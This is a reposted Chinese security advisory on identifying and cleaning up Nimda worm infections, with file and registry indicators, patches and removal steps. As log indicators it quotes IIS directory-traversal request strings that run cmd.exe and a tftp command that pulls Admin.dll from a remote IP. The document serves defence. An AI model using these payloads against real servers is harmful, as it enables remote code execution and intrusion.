感染Nimda蠕虫病毒
来源:互联网 发布:ubuntu 系统修复 编辑:程序博客网 时间:2024/04/28 13:19
如何判定感染Nimda蠕虫病毒
1、感染此病毒的NT和2000服务器,在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的
日志文件中含有以下内容
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
GET, /scripts/..%5c../winnt/system32/cmd.exe
如果日志存在以下内容,则表明该系统已受到感染,
/c+tftp%20-i%2010.88.40.89%20GET%20Admin.dll%20c:\Admin.dll
2、感染病毒的Windows NT和2000系统中存在大量的readme.eml病毒文件和后缀为nws 的文件,长度为78K。在各个分区的根目录下存在Admin.dll文件(如:c:\admin.dll、 d:\admin.dll),其文件长度为56K(57344字节) 。在system目录下存在mmc.exe文件 ,文件长度也为56K。在c:\innetpub\scripts目录下存在tftpxxx的文件。这些都是病毒 代码。
3、Windows 9X系统中的system.ini文件内容被修改
正常情况为:Shell = explorer.exe
感染病毒后变为:Shell = explorer.exe load.exe -dontrunold
4、在Windows 9x系统下,存在如下文件load.exe、 riched20.dll,这些文件都是系统的 ,隐含的属性,需要修改文件 。磁盘的可写目录中存在很多后缀为eml的文件。
5、感染病毒的系统中,在c:\tmp目录下存在大量的mepxx.tmp.exe和mepxx.tmp文件。这 些都是病毒代码。
解决方案 :
1、与网络断开,同时去掉磁盘的网络共享,防止进一步通过内网传染。
2、下载安装补丁程序
对于安装IIS的NT/2000服务器,要下载安装如下补丁:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp对于所有的IE浏览器(5.0版本以上的系统),要下载安装如下补丁:
Http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
3、Windows 9x系统需要将system.ini中的Shell = explorer.exe load.exe -dontrunold 改为
Shell = explorer.exe
4、删除wininit.ini文件中的内容。
5、用干净的 Riched20.DLL(大约100k)文件替换染毒的同名Riched20.DLL文件(57344字节),或重装Office。
6、如果使用的是WinNT或者Win2000,打开“控制面板|用户和密码”,将Administrator组中的guest帐号删除。
7、升级杀毒软件,然后使用杀毒软件清除系统中的病毒程序,必须注意由于杀读软件缺省 设置是检测程序文件,为了防止漏杀eml、tmp等带毒文件,清务必将杀毒软件设置为检 测、清除所有文件。
8、检测清除后,请重新启动系统,再次检查系统中是否还存在第三项中2、4、5子项中描 述的病毒文件。如果没有则表明已清除病毒。
9、NT/2000用户还需检查在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的日志文件中是否还含有以下内容
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
10、安装了邮件防病毒网关的邮件服务器要及时进行升级,可有效防止病毒从邮件传播。
如果存在这些内容,则表明系统还在遭受其他染毒系统的攻击,但是不会再感染病毒。请将日志文件发给我中心,以协助我们通知其他感染病毒的用户。
计算机病毒防治产品检验中心暨国家计算机病毒应急处理中心目前正在密切监视该病毒的发展动向,目前,已有瑞星公司、趋势科技公司、金山公司、冠群金辰公司、北信源公司江民公司、上海创源公司报告了该病毒的处理方案。其中瑞星和北信源、金山公司的清毒工具已经确认可行。
- 感染Nimda蠕虫病毒
- 蠕虫病毒
- 蠕虫病毒
- 病毒“鲁欧蠕虫”使用upx加壳 感染html文件
- NIMDA病毒危害及清除和免疫
- NIMDA病毒危害及清除和免疫
- NIMDA病毒危害及清除和免疫
- NIMDA病毒危害及清除和免疫
- 查杀蠕虫病毒
- 蠕虫病毒编写技术
- 蠕虫病毒编写技术
- 12.蠕虫病毒分析
- 越狱及蠕虫病毒
- 病毒EV71感染。
- 感染病毒后
- html感染型病毒
- wannacry 蠕虫勒索软件“永恒之蓝”席卷全球100多个国家,已经感染了勒索病毒“永恒之蓝”的主机该怎么处理?
- 蠕虫和病毒的区别
- Delphi程序使用资源的释放
- Oracle 11g XE & PLSQL Developer 9
- Delphi 对象的创建(create)与释放(free/destory)
- 多些时间能少写些代码
- ext4 笔记四(预分配)
- 感染Nimda蠕虫病毒
- 17周项目1:排序(用“引用”做函数形参)
- 开源免费的C/C++网络库(c/c++ sockets library) .
- 从30岁到35岁:为你的生命多积累一些厚度——与之共勉zz
- 17周项目3:相同数字
- 17周项目4:奇数因子
- 数据缓存系统-memcached介绍 .
- 第十七周上机任务项目1-体会函数参数传递2
- Tiny6410_led.bin串口信息